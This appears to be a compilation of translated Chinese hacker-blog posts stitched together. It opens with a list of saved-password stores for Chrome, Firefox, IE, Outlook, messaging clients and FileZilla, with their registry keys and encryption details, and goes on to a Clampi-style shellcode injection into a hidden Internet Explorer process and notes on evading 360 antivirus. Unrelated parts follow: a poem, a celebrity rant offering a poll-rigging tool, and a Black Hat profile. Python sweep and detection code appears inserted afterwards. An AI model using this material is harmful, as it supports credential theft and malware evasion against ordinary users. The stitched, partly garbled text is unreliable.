All Saved Password Locations.

Google Chrome:
Chrome passwords are stored in a SQLite file. The site name and site username are in clear text, but the password is encrypted with a Triple DES algorithm. The file is called Web Data and is stored in the following location:
XP – C:\Documents and Settings\Username\Local Settings\Application Data\Google\Chrome\User Data\Default
Vista – C:\Users\Username\Appdata\Local\Google\Chrome\User Data\Default
Trillian:
Note: I have just realised the new version of Trillian may store/encrypt the passwords differently.
Trillian passwords are stored in .ini files. The first character of the password is XORed with the key 243, then the password is converted into hex. The file is named for what the password is for, so if it was ICQ it would be icq.ini (for new versions I think they are all stored in a file called accounts.ini or something similar; if you open it with Notepad you will see all the data plus the encrypted password). The files are stored in the following locations:
XP (old version) – C:\Program Files\Trillian\users\
XP (new version) – C:\Documents and Settings\Username\Local Settings\Application Data\Trillian\user\global – I am not sure of the exact path, but it is somewhere there
Vista (old version) – C:\Program Files\Trillian\users\
Vista (new version) – C:\Users\Username\Appdata\Roaming\Trillian\user\global
MSN /Windows Live Messenger:
MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Creds\[Account Name]
Windows Live Messenger version 8.x/9.x: The passwords are stored in the Credentials file, with an entry name beginning with "WindowsLive:name=". It uses a set of Win API functions (the Credential APIs) to store its security data (Credentials). These functions store user information, such as names and passwords for the accounts (Windows Live ID credentials). Windows Live ID Credential records are controlled by the operating system for each user and for each session. They are attached to the "target name" and "type". If you are familiar with SQL you can think of target name and type as the primary key. The table below lists the most frequently used fields in Windows Live ID Credential records.
Paltalk:
Paltalk passwords use the same password encryption algorithm. Paltalk passwords are stored in the registry. To encrypt a new password, Paltalk reads the serial number of the C:\ disk and mixes it with the nickname. The resulting string is then mixed again with the password and some other constants. The final string is then encoded and written to the registry.
AIM, ICQ and Yahoo Messenger passwords that are stored by Paltalk are encoded with the BASE64 algorithm.
The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name]
Google Talk:
Google Talk passwords are encoded/decoded using the Crypto API. Encrypted Gmail passwords are stored by Google Talk in the registry under HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[Account Name]
Firefox:
The passwords are stored in one of the following files: signons.txt, signons2.txt or signons3.txt (depending on the Firefox version).
These password files are located inside the Firefox profile folder, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]
Also, key3.db, located in the same folder, is used for encryption/decryption of the passwords.
Yahoo Messenger 6.x:
The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager
("EOptions string" value)
Yahoo Messenger 7.5 or later:
The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager – “ETS” value.
The value stored in “ETS” value cannot be recovered back to the original password.
AIM:
AIM uses the Blowfish and base64 algorithms to encrypt AIM passwords.
A 448-bit key is used to encrypt the password with Blowfish. The encrypted string is then encoded using base64. The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords
No-IP (easy to make in VB.NET):
Passwords are encoded with Base64. You can find the account information in the following Registry locations (key, value name):
HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC, "Password"
HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC, "Checked"
HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC, "Username"
HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC, "ProxyUsername"
HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC, "ProxyPassword"
HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC, "Hosts"
Filezilla:
Passwords are stored in a .xml file located in the FileZilla folder under AppData; there are sources available for this.
Internet Explorer 4.00 – 6.00:
The passwords are stored in a secret location in the Registry known as the “Protected Storage”.
The base key of the Protected Storage is located under the following key:
“HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”.
You can browse the above key in the Registry Editor (RegEdit), but you won't be able to see the passwords, because they are encrypted.
Also, this key cannot easily be moved from one computer to another, as you can do with regular Registry keys.
Internet Explorer 7.00 – 8.00:
The new versions of Internet Explorer store the passwords in 2 different locations.
AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.
HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials , together with login passwords of LAN computers and other passwords.
Opera:
The passwords are stored in the file wand.dat, located under [Windows Profile]\Application Data\Opera\Opera\profile
Outlook Express (All Versions):
The POP3/SMTP/IMAP passwords of Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.
Outlook 98/2000:
Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.
Outlook 2002-2008:
All newer versions of Outlook store the passwords in the same Registry key as the account settings.
The accounts are stored in the Registry under HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[Account Index]
If you use Outlook to connect an account on Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.
ThunderBird:
The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]
You should search for a filename with the .s extension.
Digsby:
The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat
All other passwords are stored in Digsby servers.
Well, that's all the ones I know of; if you have any others, feel free to post them.
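For DFIR triage or a hardening audit, the file-based stores in the list above can be swept in one pass. This is an added example, not code from the original post; it assumes the per-user local and roaming AppData roots (XP's "Local Settings\Application Data" and "Application Data", or Vista's AppData\Local and AppData\Roaming) and Program Files are handed in as arguments, and it exercises itself on a constructed, empty set of store files in a temp directory.

```python
import tempfile
from pathlib import Path

# File-based credential stores from the list above, relative to the user's
# local AppData, roaming AppData (XP: "Application Data") and Program Files.
# Registry-only stores (MSN, Paltalk, Google Talk, Yahoo, AIM, No-IP, IE,
# Outlook) have no file on disk and are not part of this sweep.
FILE_STORES = [
    ("Google Chrome", "local", "Google/Chrome/User Data/Default/Web Data"),
    ("Trillian (old)", "program", "Trillian/users"),
    ("Trillian (new)", "roaming", "Trillian/user/global"),
    ("Opera", "roaming", "Opera/Opera/profile/wand.dat"),
    ("Digsby", "roaming", "Digsby/digsby.dat"),
    ("Credentials file (IE/Outlook/Live)", "roaming", "Microsoft/Credentials"),
]
# Profile-based stores: the secrets live in files inside each profile directory.
PROFILE_STORES = [
    ("Firefox", "roaming", "Mozilla/Firefox/Profiles", ("signons*.txt", "key3.db")),
    ("Thunderbird", "roaming", "Thunderbird/Profiles", ("*.s",)),
]

def credential_store_inventory(local, roaming, program_files):
    """Return a sorted list of (store, path) for every store present under the roots."""
    roots = {"local": Path(local), "roaming": Path(roaming), "program": Path(program_files)}
    hits = []
    for app, root, rel in FILE_STORES:
        p = roots[root].joinpath(*rel.split("/"))
        if p.exists():
            hits.append((app, str(p)))
    for app, root, rel, globs in PROFILE_STORES:
        base = roots[root].joinpath(*rel.split("/"))
        if base.is_dir():
            for profile in base.iterdir():
                for pattern in globs:
                    hits.extend((f"{app} [{profile.name}]", str(f)) for f in profile.glob(pattern))
    return sorted(hits)

def demo():
    """Build a constructed (empty) set of store files in a temp dir and sweep it."""
    tmp = Path(tempfile.mkdtemp())
    local, roaming, prog = tmp / "Local", tmp / "Roaming", tmp / "Program Files"
    for root, rel in ((local, "Google/Chrome/User Data/Default/Web Data"),
                      (roaming, "Opera/Opera/profile/wand.dat"),
                      (roaming, "Mozilla/Firefox/Profiles/abcd1234.default/signons3.txt"),
                      (roaming, "Mozilla/Firefox/Profiles/abcd1234.default/key3.db")):
        f = root.joinpath(*rel.split("/"))
        f.parent.mkdir(parents=True, exist_ok=True)
        f.touch()
    return credential_store_inventory(local, roaming, prog)
```

On a real host, point the three roots at the user's actual profile directories; everything the sweep reports is a file worth collecting or protecting.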

[……]

Using shellcode to inject CODE into the Internet Explorer

Create an Internet Explorer process in "Suspended Mode" with no visible window.
Inject the shellcode with the command line:

Code:

C:\\Program Files\\Internet Explorer\\iexplore.exe

Use the CreateRemoteThread API to create a remote thread at memory location 0x7C812F1D. This is where the kernel function GetCommandLineA has been mapped into Internet Explorer's memory. GetCommandLineA returns a pointer to the "shell" string, which is passed as a parameter to the current process.

Use the CreateRemoteThread API at memory address 0x004A23DC, call ReadProcessMemory, then use MapViewOfFileEx on the object.

Once again call CreateRemoteThread to execute the injected code!

This method is used by the Clampi botnet.

Thanks to the researchers. Browse to them to get more info!
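Because the shellcode in this technique travels on the command line and is fetched back through GetCommandLineA, the process-creation record is where a defender can spot it. The heuristic below is an added example, not part of the original post or the Clampi analysis: it assumes the command line as a process-creation log (for example Sysmon event ID 1) would record it, and runs over constructed samples, with a short stand-in for the injected case.

```python
import re
import string

IEXPLORE = r"C:\Program Files\Internet Explorer\iexplore.exe"

# Constructed command lines, as a process-creation log (assumed here to be
# something like Sysmon event ID 1) would record them for iexplore.exe.
SAMPLES = {
    "browse": IEXPLORE + " https://example.com/",
    "flag": IEXPLORE + " -nohome",
    # Constructed stand-in for the injected case: a few raw opcode bytes, then a
    # long run of alphanumeric-encoded shellcode with no spaces or punctuation.
    "injected": IEXPLORE + " \xfc\xeb\x1a^\x8b\xfeW\xac<Zt\x0f,A\xc0\xe0\x04" + "ILOMOIAJ" * 40,
}

PRINTABLE = set(string.printable)

def cmdline_indicators(cmdline):
    """Features that separate a shellcode-carrying argument from a URL or switch."""
    args = cmdline[len(IEXPLORE):] if cmdline.startswith(IEXPLORE) else cmdline
    args = args.strip()
    runs = re.findall(r"[A-Z]{40,}", args)  # decoder-stub style alphanumeric runs
    return {
        "nonprintable": sum(1 for ch in args if ch not in PRINTABLE),
        "longest_upper_run": max((len(r) for r in runs), default=0),
        "looks_like_url_or_switch": bool(re.match(r"(https?://|-|/)", args)),
    }

def is_suspicious(cmdline):
    """Flag a command line carrying bytes that only a decoder stub could want."""
    ind = cmdline_indicators(cmdline)
    return ind["nonprintable"] > 0 or ind["longest_upper_run"] >= 100

def triage(samples):
    """Return the names of the sample command lines that trip the heuristic."""
    return [name for name, line in samples.items() if is_suspicious(line)]
```

A browser launched with a URL or a switch never needs non-printable bytes or a hundred-character run of capitals in its arguments, so either feature on iexplore.exe is worth an alert; pair it with the suspended-creation and CreateRemoteThread indicators the post describes.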

[……]

A brief look at anti-detection techniques against 360 Active Defense (360 alerts), Rising's active defense and 360 real-time scanning

360 is very aggressive these days: on one side it links up 360 Antivirus and 360 Safeguard and collects data in the background for a joint defense strategy.

According to my research, 360 monitors your computer in real time. If one of your file operations does not conform to system norms, for example installing a service in the background, injecting into a process, or copying a file to the system directory, it uploads the parent file and everything related in the background. Once the file reaches the 360 server it is located by MD5, and from then on, if another computer performs an operation with a file of the same MD5, at 360's

[……]

One Year Later

If missing someone is the most extravagant thing
    then every day we squander a great deal
    drifting in the sea of thoughts...

If missing someone could be controlled
    then the moon and the sun could embrace,
    black and white turned upside down.

If missing someone demanded repayment
    then however much gold and silver would be as dirt,
    invisible to the eye...

If missing someone were laughable,
    the clown on the stage, his tears are real;
    the show goes on.

If missing someone were irrational,
    the birds in the sky will always have a day to perch;
    the head tilts upward.

If missing someone were bitter,
    then please add a little of that sweetness to the coffee,
    quietly savouring it.

If missing someone were monotonous,
    listening to the Symphony of Fate you feel no shock;
    fate keeps weaving.

If missing someone were man-made,
    then the deliberate could be hung outside the dream,
    the first ray of morning light.

If missing someone were unpaired,
    the bird called yuan cannot find a yang for a mate;
    one half searching for the other half.

If missing someone could be designed,
    I would design a perfect trap
    and fall into it myself.....

 

[……]

An overview of the incident of Guo Degang's disciple hitting someone

These days the entertainment headlines of all the major media have been rushing to report on this incident. Having read a great deal of it, I will post my own comments.

Looking at the assault incident as a whole, the media seem to side one-sidedly with Beijing TV; even CCTV could not sit still and invited a certain host to deliver a nauseating commentary. Well, well; you deserve no small credit for blowing this thing up so much.

I have followed the matter every day these past few days and noticed a pattern: after a feature piece comes out there is usually a poll section, and netizens click away. At first Guo Degang's approval rating is always high, but wait until after midnight; once that time passes, it seems some sordid manipulators come back to life and the clicks for the reporters' side shoot up. That truly impresses me. Do you need a tool? I can make one to order! The price is negotiable; just let me beat you up once and we are square.

After watching the assault video that was released I sighed even more: shouldn't your cutting skills be improved a little? Don't you find it too clumsy? Did you use some idiot-proof tool like "Cut Show"? Fine, it suits you well.

To quote Guo Degang: "Filming in secret and not getting beaten: since ancient times the two have rarely gone together." Filming in secret is one thing, but how can you film so self-righteously? Being self-righteous is one thing, but why cut the key part out of the footage you worked so hard to shoot? Cutting it is one thing, but why distort the truth of the matter? Living like that is hard enough; be careful when you go out next time, don't get struck by lightning. Confucius said: "Reporters are not faking it; it is grandsons who fake it!"

[……]

Fan Yuan: the first Chinese person to give a talk at BLACKHAT (Black Hat), the world's top security conference

Fan Yuan graduated from California State University with a master's degree in computer science, has more than ten years of technical R&D and project management experience at internationally renowned security companies, and has extremely deep expertise in online security, database security and auditing, and compliance (such as SOX, PCI and ISO17799/27001). Thanks to his successful practice of technical innovation in the information security field, he became the first Chinese person to give a talk at BLACKHAT (Black Hat), the world's top security conference.

Last Friday the Black Hat conference held in Las Vegas, USA, formally ended. Fan Yuan came out of the venue and rushed to catch a flight to his alma mater, California State University, where he would visit a few old friends and chat about hacker topics. In 2003 Fan Yuan was invited for the first time to attend Black Hat, the top gathering of the world's hackers, where he met his former idol, Black Hat founder Jeff Moss. Later they became friends. In 2005 Fan Yuan was invited to give a talk at that year's Black Hat conference, sharing his understanding of network security with hackers from all over the world.

Fan Yuan, whose company headquarters is in Hangzhou, the capital of leisure, does not have much time to enjoy the city's ease; he is always on the road, or online, sparring with hackers blinded by greed. He always says that he is really a white hat.

The largest hacker gathering in history

From July 28 to August 1, the two great hacker events, the Black Hat conference and the Hacker Conference, were held one after the other in Las Vegas, USA. The former has become a platform for professionals to exchange research results related to hacker attacks; the latter is more like a tournament where hackers of every kind show off their "special skills".

Compared with the Hacker Conference, Black Hat appears more formal, with its agenda filled with talks by professionals. The topics include hacking aimed at banks and other institutions.

Reportedly, Black Hat attendees come from industry, government, academia and other fields. Fan Yuan told the reporter that Moss, the veteran hacker who founded both events, said: "This year we will continue to focus on how networks operate and how to launch attacks against them." At the same time, many hackers this year have, without prior agreement, turned their attention to attacks on mobile phones.

Fan Yuan said that compared with the previous Black Hat conferences, this year's had two main differences. First, the scale was very large: more than 2,000 hackers attended, making it the largest hacker gathering in history. These hackers come from different countries around the world and have different occupations and interests, but they all share one identity, hacker, whether part-time or professional. "However, there are still very few hackers from China, and almost all of them are familiar faces."

In addition, Fan Yuan noticed that this year's Black Hat for the first time opened a sub-venue for showcasing solutions to hacker attacks. He said that if previous hacker gatherings were mainly about showing off technique, this year people have started to pay attention to solutions. In his view, this signals a compromise, or balance, between hacker culture and business. Moreover, hackers themselves keep evolving in a certain direction.

Hackers keep evolving

As the famous security consultant Bruce Schneier said: "Security is not a product; it is a process." In Fan Yuan's view, hacking is also a process of continuous evolution.

He likes to use the words of the number-one hacker Kevin Mitnick to distinguish the different stages of hackers: in the early years, some hackers destroyed other people's files or even whole hard disks; they were called crackers. Later, hacking software flourished, and many novice hackers skipped the trouble of learning the technology and simply downloaded hacking tools to break into other people's computers; these people were called script kiddies, also known in the community as dumb hackers. In fact, truly experienced hackers with programming skills prefer to develop programs, or to expand into broader application spaces.

In fact, real hackers are lonely. In the 1980s, psychological surveys found that hackers were mostly losers who tried hard to avoid interpersonal contact. But this situation is slowly changing because of the involvement of business.

As for the future of hackers, Fan Yuan said that hackers really have only three paths: hold out, leave, or be recruited.

Hackers who hold out are generally unknown; they are the diehard supporters of the original hackers. They are like ghosts of the network, strolling at ease among almost all servers looking for information that interests them, while resenting the commercialisation of hacking. Hackers who leave go with the tide and fight offensive and defensive battles over information of huge commercial value; of course, quite a few also move into other fields. Recruited hackers generally choose large internet companies or governments. Take Moss, the organiser of the hacker conference: last year he also joined the US Homeland Security Advisory Council. Kevin Mitnick, who was once forbidden to touch keyboards and mobile phones, has also been invited back.

However, Fan Yuan said that at the same time some high-level hackers move towards research and contribute more and more to society; they do work resembling basic research.

The white hat who spars with hackers

Fan Yuan said that real hackers do not take holidays. So some say that by this standard Bill Gates no longer counts as a real hacker. Gates admitted this too, saying he was only a real hacker from the age of 13 to 16.

Because hackers are busy, Fan Yuan, who has to spar with them, is also busy, and he likes to call himself a "white hat".

In his view, the distinction between black and white is not only a matter of different paths but also of different philosophies. He now rarely spars directly online with hackers who break into networks or like to plant Trojans for money; instead he is trying to find simpler and faster ways to protect data, and then to track those hackers' footprints and pin them down.

"Standing at different technical starting points and in different eras, hackers face different temptations. The earliest hackers whistled to make free phone calls; later hackers used bank vulnerabilities to transfer money directly; today's hackers steal confidential documents of incalculable value. In 2009, among the companies Symantec surveyed, 43% lost proprietary information through hacker intrusions," Fan Yuan said. "When a hacker uses the technology in his hands to cross the moral bottom line in pursuit of improper gain, he is betraying the hacker spirit."

[……]